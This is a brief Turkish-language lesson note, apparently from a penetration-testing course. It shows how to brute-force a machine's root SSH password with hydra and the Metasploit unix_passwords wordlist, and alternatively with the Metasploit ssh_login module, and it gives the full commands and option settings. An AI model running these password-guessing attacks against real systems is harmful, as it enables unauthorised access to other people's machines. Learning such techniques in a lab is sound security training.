ÖZET : Bağlandığımız makinede root şifresini ele geçirmek için brute force uygulayabiliriz. Bunun için iki araç var. Bir tanesi hydra bu araçla metsaploit klasörünün altındaki wordlistlerden ihtiyacımız olanı vererek bunu deneyebiliriz. Bunu çalıştırmak için vermemiz gereken parametreler şu şekilde : hydra -l loot -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://<ip> -t 4 -V
Bu araca alternatif olacak araç da mfsconsole yardımıyla ulaşabileceğimiz ssh_login aracı. Buna da search ssh komutuyla erişebiliriz. Seçeneklerini de username : root, pass_file : /usr/share/wordlists/metasploit/unix_passwords.txt , rhosts : <ip> ve thread miktarını da vererek bu aracı da çalıştırabiliriz.
Bu derste brute force yapmak için hydra aracını kullanacağız.Bunun için şu komutu yazıyoruz :
hydra -l root -P /usr/share/wordlists/metasploit/
Burada taba basarsak bir sürü txt olarak wordlist karşımıza çıkar. Şimdi uniz bruteforce deneyeceğimiz için o wordlisti seçiyoruz
hydra -l loot -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://<ip> -t 4 -V => Buradaki t argümanı thread sayısını -V ise verbose yani denerken gösterme işlemini gösterir.
Aynı işlemi metasploit frameworkte de yapabiliriz. Bunun için mfsconsole yazıp konsolu açıyoruz. Daha sonra search ssh diyip auxiliary/scanner/ssh/ssh_login aracını seçiyoruz.
Daha sonra seçenekleri şu şekilde ayarlıyoruz :
set username root
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
set rhosts <ip>
set threads 10
set verbose true
run
Bu işlemleri yaptığımızda sırayla zayıf şifreleri denemeye başlar.